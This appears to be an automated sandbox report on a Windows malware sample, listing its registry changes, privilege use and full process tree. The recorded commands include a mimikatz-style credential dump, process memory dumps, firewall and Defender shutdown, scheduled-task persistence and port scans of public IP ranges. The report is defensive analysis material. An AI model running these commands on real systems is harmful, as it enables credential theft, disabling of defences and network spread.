Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	detvrlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	detvrlv.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5004	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2196	bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	2196	bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe
Token: SeDebugPrivilege	4592	detvrlv.exe
Token: SeDebugPrivilege	1588	detvrlv.exe
Token: SeDebugPrivilege	3136	vfshost.exe
Token: SeDebugPrivilege	1468	kirzyyvlv.exe
Token: SeLockMemoryPrivilege	2492	eilgmk.exe
Token: SeLockMemoryPrivilege	2492	eilgmk.exe
Token: SeDebugPrivilege	3068	kirzyyvlv.exe
Token: SeDebugPrivilege	3120	kirzyyvlv.exe
Token: SeDebugPrivilege	6292	kirzyyvlv.exe
Token: SeDebugPrivilege	6608	kirzyyvlv.exe
Token: SeDebugPrivilege	1384	kirzyyvlv.exe
Token: SeDebugPrivilege	5688	kirzyyvlv.exe
Token: SeDebugPrivilege	6272	kirzyyvlv.exe
Token: SeDebugPrivilege	4652	kirzyyvlv.exe
Token: SeDebugPrivilege	5368	kirzyyvlv.exe
Token: SeDebugPrivilege	2616	kirzyyvlv.exe
Token: SeDebugPrivilege	2856	kirzyyvlv.exe
Token: SeDebugPrivilege	4244	kirzyyvlv.exe
Token: SeDebugPrivilege	6744	kirzyyvlv.exe
Token: SeDebugPrivilege	6680	kirzyyvlv.exe
Token: SeDebugPrivilege	1800	kirzyyvlv.exe
Token: SeDebugPrivilege	6164	kirzyyvlv.exe
Token: SeDebugPrivilege	6436	kirzyyvlv.exe
Token: SeDebugPrivilege	7008	kirzyyvlv.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2196	bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe
2196	bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe
4592	detvrlv.exe
4592	detvrlv.exe
1588	detvrlv.exe
1588	detvrlv.exe
2540	xohudmc.exe
380	ogmqgi.exe
2596	detvrlv.exe
2596	detvrlv.exe
5536	detvrlv.exe
5536	detvrlv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2196 wrote to memory of 3908	2196	bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe	90
PID 2196 wrote to memory of 3908	2196	bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe	90
PID 2196 wrote to memory of 3908	2196	bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe	90
PID 3908 wrote to memory of 5004	3908	cmd.exe	92
PID 3908 wrote to memory of 5004	3908	cmd.exe	92
PID 3908 wrote to memory of 5004	3908	cmd.exe	92
PID 3908 wrote to memory of 4592	3908	cmd.exe	97
PID 3908 wrote to memory of 4592	3908	cmd.exe	97
PID 3908 wrote to memory of 4592	3908	cmd.exe	97
PID 1588 wrote to memory of 4456	1588	detvrlv.exe	99
PID 1588 wrote to memory of 4456	1588	detvrlv.exe	99
PID 1588 wrote to memory of 4456	1588	detvrlv.exe	99
PID 4456 wrote to memory of 4104	4456	cmd.exe	101
PID 4456 wrote to memory of 4104	4456	cmd.exe	101
PID 4456 wrote to memory of 4104	4456	cmd.exe	101
PID 4456 wrote to memory of 460	4456	cmd.exe	102
PID 4456 wrote to memory of 460	4456	cmd.exe	102
PID 4456 wrote to memory of 460	4456	cmd.exe	102
PID 4456 wrote to memory of 4176	4456	cmd.exe	103
PID 4456 wrote to memory of 4176	4456	cmd.exe	103
PID 4456 wrote to memory of 4176	4456	cmd.exe	103
PID 4456 wrote to memory of 844	4456	cmd.exe	104
PID 4456 wrote to memory of 844	4456	cmd.exe	104
PID 4456 wrote to memory of 844	4456	cmd.exe	104
PID 4456 wrote to memory of 4548	4456	cmd.exe	105
PID 4456 wrote to memory of 4548	4456	cmd.exe	105
PID 4456 wrote to memory of 4548	4456	cmd.exe	105
PID 4456 wrote to memory of 3260	4456	cmd.exe	106
PID 4456 wrote to memory of 3260	4456	cmd.exe	106
PID 4456 wrote to memory of 3260	4456	cmd.exe	106
PID 1588 wrote to memory of 768	1588	detvrlv.exe	109
PID 1588 wrote to memory of 768	1588	detvrlv.exe	109
PID 1588 wrote to memory of 768	1588	detvrlv.exe	109
PID 1588 wrote to memory of 3756	1588	detvrlv.exe	111
PID 1588 wrote to memory of 3756	1588	detvrlv.exe	111
PID 1588 wrote to memory of 3756	1588	detvrlv.exe	111
PID 1588 wrote to memory of 2348	1588	detvrlv.exe	113
PID 1588 wrote to memory of 2348	1588	detvrlv.exe	113
PID 1588 wrote to memory of 2348	1588	detvrlv.exe	113
PID 1588 wrote to memory of 628	1588	detvrlv.exe	123
PID 1588 wrote to memory of 628	1588	detvrlv.exe	123
PID 1588 wrote to memory of 628	1588	detvrlv.exe	123
PID 628 wrote to memory of 4104	628	cmd.exe	125
PID 628 wrote to memory of 4104	628	cmd.exe	125
PID 628 wrote to memory of 4104	628	cmd.exe	125
PID 4104 wrote to memory of 4532	4104	wpcap.exe	126
PID 4104 wrote to memory of 4532	4104	wpcap.exe	126
PID 4104 wrote to memory of 4532	4104	wpcap.exe	126
PID 4532 wrote to memory of 1648	4532	net.exe	128
PID 4532 wrote to memory of 1648	4532	net.exe	128
PID 4532 wrote to memory of 1648	4532	net.exe	128
PID 4104 wrote to memory of 2532	4104	wpcap.exe	129
PID 4104 wrote to memory of 2532	4104	wpcap.exe	129
PID 4104 wrote to memory of 2532	4104	wpcap.exe	129
PID 2532 wrote to memory of 1060	2532	net.exe	131
PID 2532 wrote to memory of 1060	2532	net.exe	131
PID 2532 wrote to memory of 1060	2532	net.exe	131
PID 4104 wrote to memory of 4012	4104	wpcap.exe	132
PID 4104 wrote to memory of 4012	4104	wpcap.exe	132
PID 4104 wrote to memory of 4012	4104	wpcap.exe	132
PID 4012 wrote to memory of 2076	4012	net.exe	134
PID 4012 wrote to memory of 2076	4012	net.exe	134
PID 4012 wrote to memory of 2076	4012	net.exe	134
PID 4104 wrote to memory of 3024	4104	wpcap.exe	135

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2108
- C:\Windows\TEMP\llebqlbic\eilgmk.exe
  "C:\Windows\TEMP\llebqlbic\eilgmk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2492

C:\Users\Admin\AppData\Local\Temp\bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe
"C:\Users\Admin\AppData\Local\Temp\bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2196
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\munqipvc\detvrlv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3908
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:5004
- - C:\Windows\munqipvc\detvrlv.exe
    C:\Windows\munqipvc\detvrlv.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4592

C:\Windows\munqipvc\detvrlv.exe
C:\Windows\munqipvc\detvrlv.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4104
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:3260
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  PID:768
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  PID:3756
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:2348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\nmrmyinid\mirzmlbjb\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:628
- - C:\Windows\nmrmyinid\mirzmlbjb\wpcap.exe
    C:\Windows\nmrmyinid\mirzmlbjb\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:4104
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4532
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:1648
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2532
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:1060
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4012
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:2076
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:3024
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:5112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:3120
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:2240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:508
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4116
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:4232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\nmrmyinid\mirzmlbjb\iuatpesve.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nmrmyinid\mirzmlbjb\Scant.txt
  2⤵
  PID:2128
- - C:\Windows\nmrmyinid\mirzmlbjb\iuatpesve.exe
    C:\Windows\nmrmyinid\mirzmlbjb\iuatpesve.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nmrmyinid\mirzmlbjb\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\nmrmyinid\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nmrmyinid\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:4468
- - C:\Windows\nmrmyinid\Corporate\vfshost.exe
    C:\Windows\nmrmyinid\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ikmrdnrib" /ru system /tr "cmd /c C:\Windows\ime\detvrlv.exe"
  2⤵
  PID:1648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "ikmrdnrib" /ru system /tr "cmd /c C:\Windows\ime\detvrlv.exe"
    3⤵
    - Creates scheduled task(s)
    PID:2240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nutvcvqbm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\munqipvc\detvrlv.exe /p everyone:F"
  2⤵
  PID:3876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "nutvcvqbm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\munqipvc\detvrlv.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:4564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "cyvgmizme" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\llebqlbic\eilgmk.exe /p everyone:F"
  2⤵
  PID:552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "cyvgmizme" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\llebqlbic\eilgmk.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:2644
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  PID:4824
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:944
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:4164
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:3948
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:1988
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  PID:2616
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:5000
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:2656
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:2220
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  PID:1096
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:4288
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:4512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:3720
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:2240
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:3908
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:1092
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:4500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:5028
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4172
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 796 C:\Windows\TEMP\nmrmyinid\796.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:4436
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:2128
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:2052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:2988
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:4596
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:4852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:3932
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:460
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:1484
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:2868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:2476
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:4932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:4536
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:2044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:2124
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:1132
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:2540
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 60 C:\Windows\TEMP\nmrmyinid\60.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3068
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2108 C:\Windows\TEMP\nmrmyinid\2108.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3120
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\nmrmyinid\mirzmlbjb\scan.bat
  2⤵
  PID:4040
- - C:\Windows\nmrmyinid\mirzmlbjb\ebkkcpcil.exe
    ebkkcpcil.exe TCP 87.251.0.1 87.251.255.255 445 512 /save
    3⤵
    - Executes dropped EXE
    PID:4140
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2716 C:\Windows\TEMP\nmrmyinid\2716.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6292
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2828 C:\Windows\TEMP\nmrmyinid\2828.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6608
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2928 C:\Windows\TEMP\nmrmyinid\2928.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1384
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2976 C:\Windows\TEMP\nmrmyinid\2976.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5688
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 3748 C:\Windows\TEMP\nmrmyinid\3748.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6272
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 3844 C:\Windows\TEMP\nmrmyinid\3844.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4652
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 3936 C:\Windows\TEMP\nmrmyinid\3936.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5368
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 4020 C:\Windows\TEMP\nmrmyinid\4020.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2004 C:\Windows\TEMP\nmrmyinid\2004.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2856
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 1792 C:\Windows\TEMP\nmrmyinid\1792.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4244
- C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe
  C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 776 C:\Windows\TEMP\nmrmyinid\776.dmp
  2⤵
  - Executes dropped EXE
